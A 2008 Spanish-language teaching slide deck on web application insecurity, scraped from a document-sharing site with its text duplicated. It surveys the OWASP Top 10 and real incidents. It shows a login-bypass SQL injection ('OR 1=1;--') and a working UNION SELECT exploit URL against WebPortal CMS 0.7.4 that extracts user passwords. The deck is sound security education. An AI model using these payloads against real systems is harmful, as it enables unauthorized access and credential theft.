Ort Spirit 2008. Ezequiel Gutesman (gutes)
This document was uploaded by user and they confirmed that they have the permission to share it. If you are author or own the copyright of this book, please report to us by using this DMCA report form. Report DMCA
Overview
Download & View Ort Spirit 2008. Ezequiel Gutesman (gutes) as PDF for free.
More details
- Words: 574
- Pages: 30
(In)seguridad en aplicaciones web
Ezequiel Gutesman Escuelas Técnicas ORT Sede Almagro Core Security Technologies 2008
http://www.flickr.com/photos/da100fotos/1297595709/
gutes@ort:~$ whoami ●
●
Ex alumno de este colegio. Egresado 2000. Docente Escuelas Técnicas ORT Sede Almagro (2001- . )
●
Investigador Corelabs - Core Security Technologies.
●
Estudiante Lic. Cs. Computación. UBA – FCEyN.
¿Qué es una aplicación web?
¿Qué es una aplicación web?
¿Qué es una aplicación web?
¿Dónde las visualizamos?
http://www.flickr.com/photos/declanje well/517966692/
http://www.flickr.com/photos/kitcowan/731269 699/
Guardan NUESTRA información
http://www.flickr.com/photos/superfantasti c/2567098623/
http://www.flickr.com/photos/roby72/2401722298/
Información pública
Información privada
Una aplicación web debe:
●
Garantizar la privacidad
●
Preservar la identidad
●
Proveer de anonimidad
●
Estar disponible
●
Etc,etc...
Vulnerabilidades
http://www.flickr.com/photos/lebonbonmulticolore/ 491220542/
Vulnerabilidades en aplicaciones web
Web server
http://openclipart.org
Vulnerabilidades en aplicaciones web
Web server
http://openclipart.org
Vulnerabilidades en aplicaciones web
Web server
http://openclipart.org
Top 10 2007 ●
Cross Site Scripting (XSS)
●
Injection Flaws (en especial SQL-Injection)
●
Malicious File Execution
●
Insecure Direct Object Reference
●
Cross Site Request Forgery (CSRF)
●
Information Leakage and Improper Error Handling
●
Broken Authentication and Session Management
●
Insecure Cryptographic Storage
●
Insecure Communications
●
Failure to Restrict URL Access FUENTE: http://www.owasp.org/index.php/Top_10_2007
Incidentes ●
WHID 2008-06: Hackers Take Down Pennsylvania Government: –
Attack Method: SQL Injection
–
Country: USA
–
Outcome: Planting of Malware
–
Outcome: Defacement
–
Vertical: Government
FUENTE: http://www.webappsec.org
Incidentes ●
WHID 2008-04: RIAA (Recording Industry Association of America) web site cleared: –
Attack Method: Cross Site Scripting (XSS)
–
Attack Method: SQL Injection
–
Attack Method: Denial of Service
–
Attack Method: SQL Injection
–
Country: Global
–
Country: USA
–
Outcome: Defacement
–
Outcome: Downtime
–
Outcome: Defacement
–
Vertical: Entertainment
FUENTE: http://www.webappsec.org
Incidentes ●
WHID 2007-79: Infamous Russian malware gang used SQL injection to penetrate US government sites: –
Attack Method: SQL Injection
–
Country: Brazil
–
Country: USA
–
Origin: Russia
–
Outcome: Planting of Malware
–
Vertical: Government
FUENTE: http://www.webappsec.org
Aplicaciones web (3 capas - simplificado) Presentación (html, css, flash, etc.)
Lógica (ASP.NET, Java, PHP, Python, Ruby, etc.)
Datos (MS-SQL, MySQL, Oracle, PostgreSQL, etc.)
Atacando
Ejemplo “Traer todos los datos de los clientes con nombre de usuario 'jose' y contraseña 'pepito' ”
SELECT * FROM clients WHERE username = 'jose' AND password = 'pepito'
Ejemplo username Jose
mail [email protected]
cc 3782 8224 6310 005
billing address Yatay 240
Ejemplo SELECT * FROM clients WHERE username = '$user' AND password = '$pass' Ingreso: $user ← uno' OR 1=1;--
Ejemplo SELECT * FROM clients WHERE username = 'uno' OR 1 = 1 ; --'
SELECT * FROM clients WHERE username = 'uno' OR 1 = 1 ;--' AND password = '...
Ejemplo username
mail
cc
billing address
Jose
[email protected]
3782 8224 6310 005
Yatay 240
Fernando
[email protected]
3852 0000 0232 37
Corrientes 1112
Pablo
[email protected]
3434 0430 0112 3
Libertador 221
Mariela
[email protected]
5555 5555 55554 444
Pueyrredon 566
Agustina
[email protected]
444 0000 6812 37
Sta. Fe 322
Carla
[email protected]
385332 3 05672
Padilla 988
Pedro
[email protected]
3852 12 0256 5
Cordoba 444
Demo WebPortal CMS 'download.php' SQL Injection Vulnerability Bugtraq ID: Class: CVE: Remote: Local: Published: Updated: Credit: Vulnerable:
31156 Input Validation Error Yes No Sep 12 2008 12:00AM Sep 15 2008 07:20PM StAkeR WebPortal WebPortal CMS 0.7.4
El bug
Explotando el bug download.php?aid=1'+ union+ select+ pass,0,0,0, 0+from+portal_users+where+id='1
SELECT * FROM portal_attachments WHERE id = '1' UNION SELECT pass,0,0,0,0 FROM portal_users WHERE id = '1';
¿Preguntas? Ezequiel Gutesman egutes gutes
[_en ]
[_en ]
ort
[punto]
edu
coresecurity
[punto]
[punto]
ar com
http://corelabs.coresecurity.com
gracias!
Ezequiel Gutesman Escuelas Técnicas ORT Sede Almagro Core Security Technologies 2008
http://www.flickr.com/photos/da100fotos/1297595709/
gutes@ort:~$ whoami ●
●
Ex alumno de este colegio. Egresado 2000. Docente Escuelas Técnicas ORT Sede Almagro (2001- . )
●
Investigador Corelabs - Core Security Technologies.
●
Estudiante Lic. Cs. Computación. UBA – FCEyN.
¿Qué es una aplicación web?
¿Qué es una aplicación web?
¿Qué es una aplicación web?
¿Dónde las visualizamos?
http://www.flickr.com/photos/declanje well/517966692/
http://www.flickr.com/photos/kitcowan/731269 699/
Guardan NUESTRA información
http://www.flickr.com/photos/superfantasti c/2567098623/
http://www.flickr.com/photos/roby72/2401722298/
Información pública
Información privada
Una aplicación web debe:
●
Garantizar la privacidad
●
Preservar la identidad
●
Proveer de anonimidad
●
Estar disponible
●
Etc,etc...
Vulnerabilidades
http://www.flickr.com/photos/lebonbonmulticolore/ 491220542/
Vulnerabilidades en aplicaciones web
Web server
http://openclipart.org
Vulnerabilidades en aplicaciones web
Web server
http://openclipart.org
Vulnerabilidades en aplicaciones web
Web server
http://openclipart.org
Top 10 2007 ●
Cross Site Scripting (XSS)
●
Injection Flaws (en especial SQL-Injection)
●
Malicious File Execution
●
Insecure Direct Object Reference
●
Cross Site Request Forgery (CSRF)
●
Information Leakage and Improper Error Handling
●
Broken Authentication and Session Management
●
Insecure Cryptographic Storage
●
Insecure Communications
●
Failure to Restrict URL Access FUENTE: http://www.owasp.org/index.php/Top_10_2007
Incidentes ●
WHID 2008-06: Hackers Take Down Pennsylvania Government: –
Attack Method: SQL Injection
–
Country: USA
–
Outcome: Planting of Malware
–
Outcome: Defacement
–
Vertical: Government
FUENTE: http://www.webappsec.org
Incidentes ●
WHID 2008-04: RIAA (Recording Industry Association of America) web site cleared: –
Attack Method: Cross Site Scripting (XSS)
–
Attack Method: SQL Injection
–
Attack Method: Denial of Service
–
Attack Method: SQL Injection
–
Country: Global
–
Country: USA
–
Outcome: Defacement
–
Outcome: Downtime
–
Outcome: Defacement
–
Vertical: Entertainment
FUENTE: http://www.webappsec.org
Incidentes ●
WHID 2007-79: Infamous Russian malware gang used SQL injection to penetrate US government sites: –
Attack Method: SQL Injection
–
Country: Brazil
–
Country: USA
–
Origin: Russia
–
Outcome: Planting of Malware
–
Vertical: Government
FUENTE: http://www.webappsec.org
Aplicaciones web (3 capas - simplificado) Presentación (html, css, flash, etc.)
Lógica (ASP.NET, Java, PHP, Python, Ruby, etc.)
Datos (MS-SQL, MySQL, Oracle, PostgreSQL, etc.)
Atacando
Ejemplo “Traer todos los datos de los clientes con nombre de usuario 'jose' y contraseña 'pepito' ”
SELECT * FROM clients WHERE username = 'jose' AND password = 'pepito'
Ejemplo username Jose
mail [email protected]
cc 3782 8224 6310 005
billing address Yatay 240
Ejemplo SELECT * FROM clients WHERE username = '$user' AND password = '$pass' Ingreso: $user ← uno' OR 1=1;--
Ejemplo SELECT * FROM clients WHERE username = 'uno' OR 1 = 1 ; --'
SELECT * FROM clients WHERE username = 'uno' OR 1 = 1 ;--' AND password = '...
Ejemplo username
cc
billing address
Jose
[email protected]
3782 8224 6310 005
Yatay 240
Fernando
[email protected]
3852 0000 0232 37
Corrientes 1112
Pablo
[email protected]
3434 0430 0112 3
Libertador 221
Mariela
[email protected]
5555 5555 55554 444
Pueyrredon 566
Agustina
[email protected]
444 0000 6812 37
Sta. Fe 322
Carla
[email protected]
385332 3 05672
Padilla 988
Pedro
[email protected]
3852 12 0256 5
Cordoba 444
Demo WebPortal CMS 'download.php' SQL Injection Vulnerability Bugtraq ID: Class: CVE: Remote: Local: Published: Updated: Credit: Vulnerable:
31156 Input Validation Error Yes No Sep 12 2008 12:00AM Sep 15 2008 07:20PM StAkeR WebPortal WebPortal CMS 0.7.4
El bug
Explotando el bug download.php?aid=1'+ union+ select+ pass,0,0,0, 0+from+portal_users+where+id='1
SELECT * FROM portal_attachments WHERE id = '1' UNION SELECT pass,0,0,0,0 FROM portal_users WHERE id = '1';
¿Preguntas? Ezequiel Gutesman egutes gutes
[_en ]
[_en ]
ort
[punto]
edu
coresecurity
[punto]
[punto]
ar com
http://corelabs.coresecurity.com
gracias!
Related Documents
Ort Spirit 2008. Ezequiel Gutesman (gutes)
November 2019 1
Ort Spirit 2008. Edgardo Sokolowicz (soko)
November 2019 3
Ezequiel
November 2019 15
Ezequiel
November 2019 20
Ezequiel
November 2019 20